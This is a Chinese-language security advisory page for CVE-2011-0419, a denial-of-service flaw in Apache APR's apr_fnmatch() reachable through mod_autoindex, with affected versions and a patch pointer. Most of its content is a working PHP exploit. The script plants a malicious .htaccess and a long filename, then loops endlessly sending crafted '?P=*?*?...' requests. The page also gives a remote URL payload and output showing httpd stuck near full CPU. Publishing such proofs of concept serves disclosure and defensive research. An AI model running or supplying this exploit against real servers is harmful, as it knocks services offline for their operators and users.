发布日期:2011-05-12
更新日期:2011-05-16受影响系统:
NetBSD NetBSD 4.x
Apache Group Apache Software Foundation 2.x
Apache Group APR 1.4.3
Apache Group APR 1.4.2
不受影响系统:
Apache Group Apache Software Foundation 2.2.18
Apache Group APR 1.4.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47820
CVE ID: CVE-2011-0419APR(Apache portable Run-time libraries,Apache可移植运行库)的目的如其名称一样,主要为上层的应用程序提供一个可以跨越多操作系统平台使用的底层支持接口库。Apache APR "apr_fnmatch()"在实现上存在拒绝服务漏洞,远程攻击者可利用此漏洞造成拒绝服务。<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
author: Maksymilian ArciemowiczCVE: CVE-2011-0419
CWE: CWE-399REMOTE
Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]LOCAL
Tested on:
127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386Result:
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start Time = 121:43 and countingwhere http://[$localhost]:[$localport]/[$localuri]
*/
$localhost="localhost";
$localport=80;
$localuri="/koniec/";
if(!is_writable(".")) die("!writable");// Phase 1
// Create some filename
touch("cx".str_repeat(".",125));// Phase 2
// Create .htaccess with
unlink("./.htaccess");
$htaccess=fopen("./.htaccess", "a");
fwrite($htaccess,"AddDescription "CVE-2011-0419" ".str_repeat("*.",512)."
");
fclose($htaccess);// Phase 3
// Local connect (bypass firewall restriction)
while(1){
$fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
if (!$fp) echo "$errstr ($errno)<br />
";
else {
$out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1
";
$out .= "Host: ".$localhost."
";
$out .= "Connection: Close
";
fwrite($fp, $out);
fclose($fp);
}
}?>建议:
--------------------------------------------------------------------------------
厂商补丁:Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://httpd.apache.org/Adobe Flash Media Server XML数据远程拒绝服务漏洞Oracle GlassFish Server Administration Console远程身份验证绕过漏洞相关资讯 Apache
- Linux+Apache+PHP+Oracle 基础环境 (11/23/2015 10:40:55)
- Apache httpd 2.4.17 发布下载 (10/14/2015 08:57:55)
- Apple MacBook搭建Apache多站点 (07/08/2015 09:41:46)
| - 聊聊 Apache 开源协议 (11/23/2015 10:13:05)
- Ubuntu 14.04下 Apache修改网站根 (07/29/2015 07:10:18)
- 25 个有用 Apache ‘.htaccess’ (07/01/2015 18:44:01)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|